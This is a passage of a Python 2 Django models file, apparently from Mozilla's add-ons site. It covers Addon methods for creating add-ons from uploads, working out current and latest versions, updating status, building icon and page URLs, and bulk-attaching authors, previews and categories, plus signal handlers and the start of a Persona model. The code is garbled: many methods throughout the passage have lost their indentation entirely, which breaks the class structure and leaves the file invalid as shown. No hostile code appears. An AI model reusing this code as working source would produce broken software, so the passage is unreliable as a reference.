                    channel=amo.RELEASE_CHANNEL_LISTED, parsed_data=None):
        """Build a new Addon (and its first Version) from a FileUpload.

        ``parsed_data`` is parsed from the upload when not supplied.
        Uploads that hit the validation timeout are flagged for admin
        review.
        """
        if not parsed_data:
            parsed_data = parse_addon(upload)

        addon = cls.initialize_addon_from_upload(parsed_data, upload, channel)
        if upload.validation_timeout:
            addon.update(admin_review=True)
        Version.from_upload(upload, addon, platforms, source=source,
                            channel=channel)

        activity.log_create(amo.LOG.CREATE_ADDON, addon)
        log.debug('New addon %r from %r' % (addon, upload))
        return addon
@classmethod
def resolve_webext_translations(cls, data, upload):
"""Resolve all possible translations from an add-on.
This returns a modified `data` dictionary accordingly with proper
translations filled in.
"""
default_locale = find_language(data.get('default_locale'))
if not data.get('is_webextension') or not default_locale:
# Don't change anything if we don't meet the requirements
return data
fields = ('name', 'homepage', 'summary')
messages = extract_translations(upload)
for field in fields:
data[field] = {
locale: resolve_i18n_message(
data[field],
locale=locale,
default_locale=default_locale,
messages=messages)
for locale in messages
}
return data
def get_url_path(self, more=False, add_prefix=True):
if not self.current_version:
return ''
# If more=True you get the link to the ajax'd middle chunk of the
# detail page.
view = 'addons.detail_more' if more else 'addons.detail'
return reverse(view, args=[self.slug], add_prefix=add_prefix)
def get_dev_url(self, action='edit', args=None, prefix_only=False):
args = args or []
prefix = 'devhub'
type_ = 'themes' if self.type == amo.ADDON_PERSONA else 'addons'
if not prefix_only:
prefix += '.%s' % type_
view_name = '{prefix}.{action}'.format(prefix=prefix,
action=action)
return reverse(view_name, args=[self.slug] + args)
def get_detail_url(self, action='detail', args=None):
if args is None:
args = []
return reverse('addons.%s' % action, args=[self.slug] + args)
    def meet_the_dev_url(self):
        # URL of the "meet the developer" page for this add-on.
        return reverse('addons.meet', args=[self.slug])
    @property
    def reviews_url(self):
        # URL of the add-on's review listing page.
        return helpers.url('addons.reviews.list', self.slug)
    def get_ratings_url(self, action='list', args=None, add_prefix=True):
        # Theme ratings live under the ``ratings.themes`` URL namespace.
        return reverse('ratings.themes.%s' % action,
                       args=[self.slug] + (args or []),
                       add_prefix=add_prefix)
    @classmethod
    def get_type_url(cls, type):
        """Browse URL for an add-on type, or None for unknown types."""
        try:
            type = amo.ADDON_SLUGS[type]
        except KeyError:
            return None
        return reverse('browse.%s' % type)
    def type_url(self):
        """The url for this add-on's type."""
        return Addon.get_type_url(self.type)
    def share_url(self):
        # URL of the share page for this add-on.
        return reverse('addons.share', args=[self.slug])
    @cached_property
    def listed_authors(self):
        # Public (listed) authors ordered by their position; cached per
        # instance.
        return UserProfile.objects.filter(
            addons=self,
            addonuser__listed=True).order_by('addonuser__position')
    @classmethod
    def get_fallback(cls):
        # Translation fallback locale comes from the add-on's own
        # ``default_locale`` field.
        return cls._meta.get_field('default_locale')
    @property
    def reviews(self):
        # Top-level reviews only (replies have ``reply_to`` set).
        return Review.objects.filter(addon=self, reply_to=None)
def get_category(self, app_id):
categories = self.app_categories.get(amo.APP_IDS.get(app_id))
return categories[0] if categories else None
    def language_ascii(self):
        # Human-readable language name for the add-on's default locale.
        lang = trans_real.to_language(self.default_locale)
        return settings.LANGUAGES.get(lang)
    @property
    def valid_file_statuses(self):
        # Public add-ons only accept public files; otherwise any valid
        # file status counts.
        if self.status == amo.STATUS_PUBLIC:
            return [amo.STATUS_PUBLIC]
        return amo.VALID_FILE_STATUSES
    def find_latest_public_listed_version(self):
        """Retrieve the latest public listed version of an addon.

        If the add-on is not public, it can return a listed version awaiting
        review (since non-public add-ons should not have public versions)."""
        if self.type == amo.ADDON_PERSONA:
            return
        try:
            statuses = self.valid_file_statuses
            status_list = ','.join(map(str, statuses))
            fltr = {
                'channel': amo.RELEASE_CHANNEL_LISTED,
                'files__status__in': statuses
            }
            # The raw NOT EXISTS clause rejects versions that have *any*
            # file outside the accepted statuses — i.e. every file of the
            # returned version must match. Versions are assumed to be
            # ordered newest-first by the default manager ordering.
            return self.versions.no_cache().filter(**fltr).extra(
                where=["""
                    NOT EXISTS (
                        SELECT 1 FROM files AS f2
                        WHERE f2.version_id = versions.id AND
                              f2.status NOT IN (%s))
                    """ % status_list])[0]
        except (IndexError, Version.DoesNotExist):
            return None
    def find_latest_version(
            self, channel, exclude=(amo.STATUS_DISABLED, amo.STATUS_BETA)):
        """Retrieve the latest version of an add-on for the specified channel.

        If channel is None either channel is returned.

        Keyword arguments:
        exclude -- exclude versions for which all files have one
                   of those statuses (default STATUS_DISABLED, STATUS_BETA)."""
        # If the add-on is deleted or hasn't been saved yet, it should not
        # have a latest version.
        if not self.id or self.status == amo.STATUS_DELETED:
            return None
        # We can't use .exclude(files__status=excluded_statuses) because that
        # would exclude a version if *any* of its files match but if there is
        # only one file that doesn't have one of the excluded statuses it
        # should be enough for that version to be considered.
        statuses_no_disabled_or_beta = (
            set(amo.STATUS_CHOICES_FILE.keys()) - set(exclude))
        try:
            latest_qs = (
                Version.objects.filter(addon=self)
                .filter(files__status__in=statuses_no_disabled_or_beta))
            if channel is not None:
                latest_qs = latest_qs.filter(channel=channel)
            # .latest() picks the most recent per the model's Meta options.
            latest = latest_qs.latest()
            # Pre-populate the back-reference to avoid an extra query.
            latest.addon = self
        except Version.DoesNotExist:
            latest = None
        return latest
    @write
    def update_version(self, ignore=None, _signal=True):
        """
        Update the current_version field on this add-on if necessary.

        Returns True if we updated the current_version field.

        The optional ``ignore`` parameter, if present, is a a version
        to not consider as part of the update, since it may be in the
        process of being deleted.

        Pass ``_signal=False`` if you want to no signals fired at all.

        """
        if self.is_persona():
            # Themes should only have a single version. So, if there is not
            # current version set, we just need to copy over the latest version
            # to current_version and we should never have to set it again.
            if not self._current_version:
                latest_version = self.find_latest_version(None)
                if latest_version:
                    self.update(_current_version=latest_version, _signal=False)
                    return True
            return False
        new_current_version = self.find_latest_public_listed_version()
        updated = {}
        send_signal = False
        if self._current_version != new_current_version:
            updated['_current_version'] = new_current_version
            send_signal = True
        # update_version can be called by a post_delete signal (such
        # as File's) when deleting a version. If so, we should avoid putting
        # that version-being-deleted in any fields.
        if ignore is not None:
            updated = {k: v for k, v in updated.iteritems() if v != ignore}
        if updated:
            diff = [self._current_version, new_current_version]
            # Pass along _signal to the .update() to prevent it from firing
            # signals if we don't want them.
            updated['_signal'] = _signal
            try:
                self.update(**updated)
                if send_signal and _signal:
                    signals.version_changed.send(sender=self)
                log.info(u'Version changed from current: %s to %s '
                         u'for addon %s'
                         % tuple(diff + [self]))
            except Exception, e:
                # Best-effort: a failed save must not propagate out of a
                # signal handler; log and carry on.
                log.error(u'Could not save version changes current: %s to %s '
                          u'for addon %s (%s)' %
                          tuple(diff + [self, e]))
        return bool(updated)
    def increment_theme_version_number(self):
        """Increment theme version number by 1."""
        # Themes use simple float-like version strings (e.g. '1.0' -> '2.0').
        latest_version = self.find_latest_version(None)
        version = latest_version or self.current_version
        version.version = str(float(version.version) + 1)
        # Set the current version.
        self.update(_current_version=version.save())
    def invalidate_d2c_versions(self):
        """Invalidates the cache of compatible versions.

        Call this when there is an event that may change what compatible
        versions are returned so they are recalculated.
        """
        # Bumping the namespace key implicitly invalidates every cache
        # entry created under the previous namespace value.
        key = cache_ns_key('d2c-versions:%s' % self.id, increment=True)
        log.info('Incrementing d2c-versions namespace for add-on [%s]: %s' % (
            self.id, key))
    @property
    def current_version(self):
        """Return the latest public listed version of an addon

        If the add-on is not public, it can return a listed version awaiting
        review (since non-public add-ons should not have public versions).

        If the add-on has not been created yet or is deleted, it returns None.
        """
        if not self.id or self.status == amo.STATUS_DELETED:
            return None
        try:
            return self._current_version
        except ObjectDoesNotExist:
            # The related version row may have been deleted underneath us.
            pass
        return None
    @cached_property
    def latest_unlisted_version(self):
        """Shortcut property for Addon.find_latest_version(
        channel=RELEASE_CHANNEL_UNLISTED)."""
        return self.find_latest_version(channel=amo.RELEASE_CHANNEL_UNLISTED)
    @cached_property
    def binary(self):
        """Returns if the current version has binary files."""
        version = self.current_version
        if version:
            return version.files.filter(binary=True).exists()
        return False
    @cached_property
    def binary_components(self):
        """Returns if the current version has files with binary_components."""
        version = self.current_version
        if version:
            return version.files.filter(binary_components=True).exists()
        return False
    def get_icon_dir(self):
        # Icons are sharded into directories of 1000 add-ons each
        # (Python 2 integer division).
        return os.path.join(helpers.user_media_path('addon_icons'),
                            '%s' % (self.id / 1000))
    def get_icon_url(self, size, use_default=True):
        """
        Returns the addon's icon url according to icon_type.

        If it's a persona, it will return the icon_url of the associated
        Persona instance.

        If it's a theme and there is no icon set, it will return the default
        theme icon.

        If it's something else, it will return the default add-on icon, unless
        use_default is False, in which case it will return None.
        """
        icon_type_split = []
        if self.icon_type:
            icon_type_split = self.icon_type.split('/')

        # Get the closest allowed size without going over
        if (size not in amo.ADDON_ICON_SIZES and
                size >= amo.ADDON_ICON_SIZES[0]):
            size = [s for s in amo.ADDON_ICON_SIZES if s < size][-1]
        elif size < amo.ADDON_ICON_SIZES[0]:
            size = amo.ADDON_ICON_SIZES[0]

        # Figure out what to return for an image URL
        if self.type == amo.ADDON_PERSONA:
            return self.persona.icon_url
        if not self.icon_type:
            if self.type == amo.ADDON_THEME:
                icon = amo.ADDON_ICONS[amo.ADDON_THEME]
                return "%simg/icons/%s" % (settings.STATIC_URL, icon)
            else:
                if not use_default:
                    return None
                return self.get_default_icon_url(size)
        elif icon_type_split[0] == 'icon':
            # Built-in gallery icon (icon_type looks like 'icon/<name>').
            return '{0}img/addon-icons/{1}-{2}.png'.format(
                settings.STATIC_URL,
                icon_type_split[1],
                size
            )
        else:
            # Custom uploaded icon, served from user media.
            # [1] is the whole ID, [2] is the directory
            split_id = re.match(r'((\d*?)\d{1,3})$', str(self.id))
            # Cache-bust on the modification timestamp.
            modified = int(time.mktime(self.modified.timetuple()))
            path = '/'.join([
                split_id.group(2) or '0',
                '{0}-{1}.png?modified={2}'.format(self.id, size, modified),
            ])
            return helpers.user_media_url('addon_icons') + path
def get_default_icon_url(self, size):
return '{0}img/addon-icons/{1}-{2}.png'.format(
settings.STATIC_URL, 'default', size
)
    @write
    def update_status(self, ignore_version=None):
        """Recompute this add-on's status from its listed versions/files,
        then refresh ``current_version`` (ignoring ``ignore_version``,
        which may be mid-deletion)."""
        self.reload()

        if (self.status in [amo.STATUS_NULL, amo.STATUS_DELETED] or
                self.is_disabled or self.is_persona()):
            # Nothing to recompute; just refresh the current version.
            self.update_version(ignore=ignore_version)
            return

        versions = self.versions.filter(channel=amo.RELEASE_CHANNEL_LISTED)
        status = None
        if not versions.exists():
            status = amo.STATUS_NULL
            reason = 'no listed versions'
        elif not versions.filter(
                files__status__in=amo.VALID_FILE_STATUSES).exists():
            status = amo.STATUS_NULL
            reason = 'no listed version with valid file'
        elif (self.status == amo.STATUS_PUBLIC and
              not versions.filter(files__status=amo.STATUS_PUBLIC).exists()):
            if versions.filter(
                    files__status=amo.STATUS_AWAITING_REVIEW).exists():
                status = amo.STATUS_NOMINATED
                reason = 'only an unreviewed file'
            else:
                status = amo.STATUS_NULL
                reason = 'no reviewed files'
        elif self.status == amo.STATUS_PUBLIC:
            latest_version = self.find_latest_version(
                channel=amo.RELEASE_CHANNEL_LISTED)
            if (latest_version and latest_version.has_files and
                (latest_version.all_files[0].status ==
                 amo.STATUS_AWAITING_REVIEW)):
                # Addon is public, but its latest file is not (it's the case on
                # a new file upload). So, call update, to trigger watch_status,
                # which takes care of setting nomination time when needed.
                status = self.status
                reason = 'triggering watch_status'

        if status is not None:
            log.info('Changing add-on status [%s]: %s => %s (%s).'
                     % (self.id, self.status, status, reason))
            self.update(status=status)
            activity.log_create(amo.LOG.CHANGE_STATUS,
                                self.get_status_display(), self)

        self.update_version(ignore=ignore_version)
    @staticmethod
    def attach_related_versions(addons, addon_dict=None):
        """Bulk-populate ``_current_version`` on each addon with a single
        query (used by the transformer to avoid N+1 lookups)."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)

        all_ids = set(filter(None, (a._current_version_id for a in addons)))
        versions = list(Version.objects.filter(id__in=all_ids).order_by())
        for version in versions:
            try:
                addon = addon_dict[version.addon_id]
            except KeyError:
                log.debug('Version %s has an invalid add-on id.' % version.id)
                continue
            if addon._current_version_id == version.id:
                addon._current_version = version
            # Pre-populate the reverse relation as well.
            version.addon = addon
    @staticmethod
    def attach_listed_authors(addons, addon_dict=None):
        """Bulk-populate ``listed_authors`` on each addon, ordered by
        author position."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)

        qs = (UserProfile.objects.no_cache()
              .filter(addons__in=addons, addonuser__listed=True)
              .extra(select={'addon_id': 'addons_users.addon_id',
                             'position': 'addons_users.position'}))
        # groupby requires the rows to be pre-sorted by the grouping key.
        qs = sorted(qs, key=lambda u: (u.addon_id, u.position))
        for addon_id, users in itertools.groupby(qs, key=lambda u: u.addon_id):
            addon_dict[addon_id].listed_authors = list(users)
        # FIXME: set listed_authors to empty list on addons without listed
        # authors.
    @staticmethod
    def attach_previews(addons, addon_dict=None, no_transforms=False):
        """Bulk-populate ``all_previews`` on each addon (promo graphics,
        which have negative positions, are excluded)."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)

        qs = Preview.objects.filter(addon__in=addons,
                                    position__gte=0).order_by()
        if no_transforms:
            qs = qs.no_transforms()
        # groupby requires rows sorted by the grouping key first.
        qs = sorted(qs, key=lambda x: (x.addon_id, x.position, x.created))
        for addon, previews in itertools.groupby(qs, lambda x: x.addon_id):
            addon_dict[addon].all_previews = list(previews)
        # FIXME: set all_previews to empty list on addons without previews.
    @staticmethod
    def attach_static_categories(addons, addon_dict=None):
        """Bulk-populate ``category_ids`` and ``all_categories`` (static
        category constants) on each addon."""
        if addon_dict is None:
            addon_dict = dict((a.id, a) for a in addons)

        qs = AddonCategory.objects.values_list(
            'addon', 'category').filter(addon__in=addon_dict)
        qs = sorted(qs, key=lambda x: (x[0], x[1]))
        for addon_id, cats_iter in itertools.groupby(qs, key=lambda x: x[0]):
            # The second value of each tuple in cats_iter are the category ids
            # we want.
            addon_dict[addon_id].category_ids = [c[1] for c in cats_iter]
            # Silently drop ids with no matching static category.
            addon_dict[addon_id].all_categories = [
                CATEGORIES_BY_ID[cat_id] for cat_id
                in addon_dict[addon_id].category_ids
                if cat_id in CATEGORIES_BY_ID]
    @staticmethod
    @timer
    def transformer(addons):
        """Queryset transformer: batch-fetch related data (categories,
        versions, authors, personas, previews) for a list of addons."""
        if not addons:
            return

        addon_dict = {a.id: a for a in addons}

        # Attach categories. This needs to be done before separating addons
        # from personas, because Personas need categories for the theme_data
        # JSON dump, rest of the add-ons need the first category to be
        # displayed in detail page / API.
        Addon.attach_static_categories(addons, addon_dict=addon_dict)

        personas = [a for a in addons if a.type == amo.ADDON_PERSONA]
        addons = [a for a in addons if a.type != amo.ADDON_PERSONA]

        # Set _current_version.
        Addon.attach_related_versions(addons, addon_dict=addon_dict)

        # Attach listed authors.
        Addon.attach_listed_authors(addons, addon_dict=addon_dict)

        # Persona-specific stuff
        for persona in Persona.objects.no_cache().filter(addon__in=personas):
            addon = addon_dict[persona.addon_id]
            addon.persona = persona
            addon.weekly_downloads = persona.popularity

        # Attach previews.
        Addon.attach_previews(addons, addon_dict=addon_dict)

        return addon_dict
    @property
    def show_beta(self):
        # Beta versions are only surfaced for public add-ons.
        return self.status == amo.STATUS_PUBLIC and self.current_beta_version
    def show_adu(self):
        # Average-daily-user stats are shown for everything except search
        # engines.
        return self.type != amo.ADDON_SEARCH
    @cached_property
    def current_beta_version(self):
        """Retrieves the latest version of an addon, in the beta channel."""
        # Implicitly returns None when there is no beta version.
        versions = self.versions.filter(files__status=amo.STATUS_BETA)[:1]

        if versions:
            return versions[0]
    @property
    def icon_url(self):
        # Default icon size used across listing pages.
        return self.get_icon_url(32)
def authors_other_addons(self, app=None):
"""
Return other addons by the author(s) of this addon,
optionally takes an app.
"""
if app:
qs = Addon.objects.listed(app)
else:
qs = Addon.objects.valid()
return (qs.exclude(id=self.id)
.filter(addonuser__listed=True,
authors__in=self.listed_authors)
.distinct())
    @property
    def contribution_url(self, lang=settings.LANGUAGE_CODE,
                         app=settings.DEFAULT_APP):
        # NOTE(review): ``lang`` and ``app`` are dead parameters — property
        # access only ever passes ``self``, so the defaults are always used
        # and neither parameter affects the result. Consider removing them.
        return reverse('addons.contribute', args=[self.slug])
@property
def thumbnail_url(self):
"""
Returns the addon's thumbnail url or a default.
"""
try:
preview = self.all_previews[0]
return preview.thumbnail_url
except IndexError:
return settings.STATIC_URL + '/img/icons/no-preview.png'
    def can_request_review(self):
        """Return whether an add-on can request a review or not."""
        if (self.is_disabled or
                self.status in (amo.STATUS_PUBLIC,
                                amo.STATUS_NOMINATED,
                                amo.STATUS_DELETED)):
            return False

        # A review can only be requested when a non-beta listed version
        # with at least one file exists.
        latest_version = self.find_latest_version(
            amo.RELEASE_CHANNEL_LISTED, exclude=(amo.STATUS_BETA,))

        return latest_version is not None and latest_version.files.exists()
    def is_persona(self):
        # True when this add-on is a (lightweight) theme / persona.
        return self.type == amo.ADDON_PERSONA
    @property
    def is_disabled(self):
        """True if this Addon is disabled.

        It could be disabled by an admin or disabled by the developer
        """
        return self.status == amo.STATUS_DISABLED or self.disabled_by_user
    @property
    def is_deleted(self):
        # Soft-deleted add-ons keep their rows with STATUS_DELETED.
        return self.status == amo.STATUS_DELETED
    def is_unreviewed(self):
        # True while the add-on sits in one of the review queues.
        return self.status in amo.UNREVIEWED_ADDON_STATUSES
    def is_public(self):
        # Public status can still be overridden by a developer disable.
        return self.status == amo.STATUS_PUBLIC and not self.disabled_by_user
    def has_complete_metadata(self, has_listed_versions=None):
        """See get_required_metadata for has_listed_versions details."""
        return all(self.get_required_metadata(
            has_listed_versions=has_listed_versions))
    def get_required_metadata(self, has_listed_versions=None):
        """If has_listed_versions is not specified this method will return the
        current (required) metadata (truthy values if present) for this Addon.

        If has_listed_versions is specified then the method will act as if
        Addon.has_listed_versions() returns that value. Used to predict if the
        addon will require extra metadata before a version is created."""
        if has_listed_versions is None:
            has_listed_versions = self.has_listed_versions()
        if not has_listed_versions:
            # Add-ons with only unlisted versions have no required metadata.
            return []

        # We need to find out if the add-on has a license set. We prefer to
        # check the current_version first because that's what would be used for
        # public pages, but if there isn't any listed version will do.
        version = self.current_version or self.find_latest_version(
            channel=amo.RELEASE_CHANNEL_LISTED, exclude=())
        # Each entry is truthy when present; all() over this list decides
        # metadata completeness.
        return [
            self.all_categories,
            self.summary,
            (version and version.license),
        ]
    def should_redirect_to_submit_flow(self):
        # Incomplete add-ons with a listed version should be pushed back
        # into the submission flow to finish their metadata.
        return (
            self.status == amo.STATUS_NULL and
            not self.has_complete_metadata() and
            self.find_latest_version(channel=amo.RELEASE_CHANNEL_LISTED))
    def is_pending(self):
        # True while awaiting a (theme) review decision.
        return self.status == amo.STATUS_PENDING
    def is_rejected(self):
        # True when the review ended in rejection.
        return self.status == amo.STATUS_REJECTED
    def can_be_deleted(self):
        # Already soft-deleted add-ons cannot be deleted again.
        return not self.is_deleted
    def has_listed_versions(self):
        # True when at least one version targets the listed channel.
        return self.versions.filter(
            channel=amo.RELEASE_CHANNEL_LISTED).exists()
    def has_unlisted_versions(self):
        # True when at least one version targets the unlisted channel.
        return self.versions.filter(
            channel=amo.RELEASE_CHANNEL_UNLISTED).exists()
    @classmethod
    def featured_random(cls, app, lang):
        # Delegates to the featured-collections helper; returns addon ids.
        return get_featured_ids(app, lang)
    @property
    def requires_restart(self):
        """Whether the add-on current version requires a browser restart to
        work."""
        # Falsy (None) when there is no current version at all.
        return self.current_version and self.current_version.requires_restart
    def is_featured(self, app, lang=None):
        """Is add-on globally featured for this app and language?"""
        # Note: implicitly returns None (falsy) when no app is given.
        if app:
            # Weird n+1 in a loop context; could be easily cached.
            return self.id in get_featured_ids(app, lang)
    def has_full_profile(self):
        """Is developer profile public (completed)?"""
        return self.the_reason and self.the_future
    def has_profile(self):
        """Is developer profile (partially or entirely) completed?"""
        return self.the_reason or self.the_future
@cached_property
def tags_partitioned_by_developer(self):
"""Returns a tuple of developer tags and user tags for this addon."""
tags = self.tags.not_denied()
if self.is_persona:
return [], tags
user_tags = tags.exclude(addon_tags__user__in=self.listed_authors)
dev_tags = tags.exclude(id__in=[t.id for t in user_tags])
return dev_tags, user_tags
    @cached_property
    def compatible_apps(self):
        """Shortcut to get compatible apps for the current version."""
        # Search providers and personas don't list their supported apps.
        if self.type in amo.NO_COMPAT:
            # Map every supported app to None (no version range).
            return dict((app, None) for app in
                        amo.APP_TYPE_SUPPORT[self.type])
        if self.current_version:
            return self.current_version.compatible_apps
        else:
            return {}
    def accepts_compatible_apps(self):
        """True if this add-on lists compatible apps."""
        return self.type not in amo.NO_COMPAT
def incompatible_latest_apps(self):
"""Returns a list of applications with which this add-on is
incompatible (based on the latest version of each app).
"""
return [app for app, ver in self.compatible_apps.items() if ver and
version_int(ver.max.version) < version_int(app.latest_version)]
def has_author(self, user, roles=None):
"""True if ``user`` is an author with any of the specified ``roles``.
``roles`` should be a list of valid roles (see amo.AUTHOR_ROLE_*). If
not specified, has_author will return true if the user has any role.
"""
if user is None or user.is_anonymous():
return False
if roles is None:
roles = dict(amo.AUTHOR_CHOICES).keys()
return AddonUser.objects.filter(addon=self, user=user,
role__in=roles).exists()
    @property
    def takes_contributions(self):
        # Contributions need a public add-on, an opt-in, and a payment
        # destination (PayPal or charity).
        return (self.status == amo.STATUS_PUBLIC and
                self.wants_contributions and
                (self.paypal_id or self.charity_id))
    @classmethod
    def _last_updated_queries(cls):
        """
        Get the queries used to calculate addon.last_updated.
        """
        status_change = Max('versions__files__datestatuschanged')
        # Public add-ons: last status change of a public file.
        public = (
            Addon.objects.no_cache().filter(
                status=amo.STATUS_PUBLIC,
                versions__files__status=amo.STATUS_PUBLIC)
            .exclude(type=amo.ADDON_PERSONA)
            .values('id').annotate(last_updated=status_change))

        # Non-valid-status add-ons: most recent valid file creation date.
        stati = amo.VALID_ADDON_STATUSES
        exp = (Addon.objects.no_cache().exclude(status__in=stati)
               .filter(versions__files__status__in=amo.VALID_FILE_STATUSES)
               .values('id')
               .annotate(last_updated=Max('versions__files__created')))

        # Personas: creation date stands in for last_updated.
        personas = (Addon.objects.no_cache().filter(type=amo.ADDON_PERSONA)
                    .extra(select={'last_updated': 'created'}))
        return dict(public=public, exp=exp, personas=personas)
    @cached_property
    def all_categories(self):
        # Static category constants for this add-on; ids without a static
        # mapping are dropped by filter(None, ...).
        return filter(
            None, [cat.to_static_category() for cat in self.categories.all()])
    @cached_property
    def all_previews(self):
        # Materialized list so templates can index/len it cheaply.
        return list(self.get_previews())
    def get_previews(self):
        """Exclude promo graphics."""
        # Promo graphics are stored with position == -1.
        return self.previews.exclude(position=-1)
@property
def app_categories(self):
app_cats = {}
categories = sorted_groupby(
sorted(self.all_categories, key=attrgetter('weight', 'name')),
key=lambda x: amo.APP_IDS.get(x.application))
for app, cats in categories:
app_cats[app] = list(cats)
return app_cats
    def remove_locale(self, locale):
        """NULLify strings in this locale for the add-on and versions."""
        for o in itertools.chain([self], self.versions.all()):
            Translation.objects.remove_for(o, locale)
    def get_localepicker(self):
        """For language packs, gets the contents of localepicker."""
        if (self.type == amo.ADDON_LPAPP and
                self.status == amo.STATUS_PUBLIC and
                self.current_version):
            files = (self.current_version.files
                         .filter(platform=amo.PLATFORM_ANDROID.id))
            try:
                # Decode the raw file bytes as UTF-8 (Python 2 unicode()).
                return unicode(files[0].get_localepicker(), 'utf-8')
            except IndexError:
                # No Android file: fall through to the empty default.
                pass
        return ''
    def can_review(self, user):
        # Authors may not review their own add-on; anonymous users
        # (user is None/falsy) may review.
        return not(user and self.has_author(user))
    @property
    def all_dependencies(self):
        """Return all the (valid) add-ons this add-on depends on."""
        # Display is capped at the first three dependencies.
        return list(self.dependencies.valid().all()[:3])
    def check_ownership(self, request, require_owner, require_author,
                        ignore_disabled, admin):
        """
        Used by acl.check_ownership to see if request.user has permissions for
        the addon.
        """
        if require_author:
            # "Author" access is broader: any role, even on disabled
            # add-ons, and no admin override.
            require_owner = False
            ignore_disabled = True
            admin = False
        return acl.check_addon_ownership(request, self, admin=admin,
                                         viewer=(not require_owner),
                                         ignore_disabled=ignore_disabled)
    @property
    def feature_compatibility(self):
        try:
            feature_compatibility = self.addonfeaturecompatibility
        except AddonFeatureCompatibility.DoesNotExist:
            # If it does not exist, return a blank one, no need to create. It's
            # the caller responsibility to create when needed to avoid
            # unexpected database writes.
            feature_compatibility = AddonFeatureCompatibility()
        return feature_compatibility
    def should_show_permissions(self, version=None):
        # Permissions UI applies to extensions whose file either is a
        # legacy add-on or is a webextension with declared permissions.
        version = version or self.current_version
        return (self.type == amo.ADDON_EXTENSION and
                version and version.all_files[0] and
                (not version.all_files[0].is_webextension or
                 version.all_files[0].webext_permissions))
# Keep the add-on's translated fields in sync on every save.
dbsignals.pre_save.connect(save_signal, sender=Addon,
                           dispatch_uid='addon_translations')
@receiver(signals.version_changed, dispatch_uid='version_changed')
def version_changed(sender, **kw):
    """Queue the async version_changed task when current_version moves."""
    from . import tasks
    tasks.version_changed.delay(sender.id)
@receiver(dbsignals.post_save, sender=Addon,
          dispatch_uid='addons.search.index')
def update_search_index(sender, instance, **kw):
    """Reindex the add-on in search after save (skipped for raw fixture
    loads)."""
    from . import tasks
    if not kw.get('raw'):
        tasks.index_addons.delay([instance.id])
@Addon.on_change
def watch_status(old_attr=None, new_attr=None, instance=None,
                 sender=None, **kwargs):
    """
    Set nomination date if the addon is new in queue or updating.

    The nomination date cannot be reset, say, when a developer cancels
    their request for review and re-requests review.

    If a version is rejected after nomination, the developer has
    to upload a new version.
    """
    if old_attr is None:
        old_attr = {}
    if new_attr is None:
        new_attr = {}
    new_status = new_attr.get('status')
    old_status = old_attr.get('status')
    latest_version = instance.find_latest_version(
        channel=amo.RELEASE_CHANNEL_LISTED)

    # Nothing to do without a valid new status and a listed version.
    if (new_status not in amo.VALID_ADDON_STATUSES or
            not new_status or not latest_version):
        return

    if old_status not in amo.UNREVIEWED_ADDON_STATUSES:
        # New: will (re)set nomination only if it's None.
        latest_version.reset_nomination_time()
    elif latest_version.has_files:
        # Updating: inherit nomination from last nominated version.
        # Calls `inherit_nomination` manually given that signals are
        # deactivated to avoid circular calls.
        inherit_nomination(None, latest_version)
@Addon.on_change
def watch_disabled(old_attr=None, new_attr=None, instance=None, sender=None,
                   **kwargs):
    """Hide or unhide the add-on's files when its disabled state flips."""
    if old_attr is None:
        old_attr = {}
    if new_attr is None:
        new_attr = {}
    # Rebuild the *old* disabled state from the pre-save attributes by
    # instantiating a throwaway Addon with just those two fields.
    attrs = dict((k, v) for k, v in old_attr.items()
                 if k in ('disabled_by_user', 'status'))
    if Addon(**attrs).is_disabled and not instance.is_disabled:
        # Re-enabled: move files back to their public location.
        for f in File.objects.filter(version__addon=instance.id):
            f.unhide_disabled_file()
    if instance.is_disabled and not Addon(**attrs).is_disabled:
        # Newly disabled: move files out of the public location.
        for f in File.objects.filter(version__addon=instance.id):
            f.hide_disabled_file()
@Addon.on_change
def watch_developer_notes(old_attr=None, new_attr=None, instance=None,
                          sender=None, **kwargs):
    """Clear pending info requests on all versions when the whiteboard or
    developer comments change (the developer has responded)."""
    if old_attr is None:
        old_attr = {}
    if new_attr is None:
        new_attr = {}
    whiteboard_changed = (
        new_attr.get('whiteboard') and
        old_attr.get('whiteboard') != new_attr.get('whiteboard'))
    developer_comments_changed = (new_attr.get('_developer_comments_cache') and
                                  old_attr.get('_developer_comments_cache') !=
                                  new_attr.get('_developer_comments_cache'))
    if whiteboard_changed or developer_comments_changed:
        instance.versions.update(has_info_request=False)
def attach_translations(addons):
    """Put all translations into a translations dict."""
    attach_trans_dict(Addon, addons)
def attach_tags(addons):
    """Attach a ``tag_list`` of tag strings to each addon in ``addons``."""
    by_id = dict((addon.id, addon) for addon in addons)
    pairs = (Tag.objects.not_denied()
             .filter(addons__in=by_id)
             .values_list('addons__id', 'tag_text'))
    for addon_id, group in sorted_groupby(pairs, lambda pair: pair[0]):
        by_id[addon_id].tag_list = [text for _, text in group]
class Persona(caching.CachingMixin, models.Model):
    """Personas-specific additions to the add-on model."""
    STATUS_CHOICES = amo.STATUS_CHOICES_PERSONA
    addon = models.OneToOneField(Addon, null=True)
    # Legacy id from getpersonas.com; 0 means a natively-submitted theme.
    persona_id = models.PositiveIntegerField(db_index=True)
    # name: deprecated in favor of Addon model's name field
    # description: deprecated, ditto
    header = models.CharField(max_length=64, null=True)
    footer = models.CharField(max_length=64, null=True)
    accentcolor = models.CharField(max_length=10, null=True)
    textcolor = models.CharField(max_length=10, null=True)
    author = models.CharField(max_length=255, null=True)
    display_username = models.CharField(max_length=255, null=True)
    submit = models.DateTimeField(null=True)
    approve = models.DateTimeField(null=True)
    movers = models.FloatField(null=True, db_index=True)
    popularity = models.IntegerField(null=False, default=0, db_index=True)
    license = models.PositiveIntegerField(
        choices=amo.PERSONA_LICENSES_CHOICES, null=True, blank=True)

    # To spot duplicate submissions.
    checksum = models.CharField(max_length=64, blank=True, default='')
    dupe_persona = models.ForeignKey('self', null=True)

    objects = caching.CachingManager()

    class Meta:
        db_table = 'personas'

    def __unicode__(self):
        return unicode(self.addon.name)

    def is_new(self):
        # "New" = submitted natively on AMO, not imported from getpersonas.
        return self.persona_id == 0

    def _image_url(self, filename):
        """Build a user-media URL for one of this persona's images."""
        host = helpers.user_media_url('addons')
        image_url = posixpath.join(host, str(self.addon.id), filename or '')
        # TODO: Bust the cache on the hash of the image contents or something.
        if self.addon.modified is not None:
            modified = int(time.mktime(self.addon.modified.timetuple()))
        else:
            modified = 0
        return '%s?%s' % (image_url, modified)

    def _image_path(self, filename):
        """Filesystem path for one of this persona's images."""
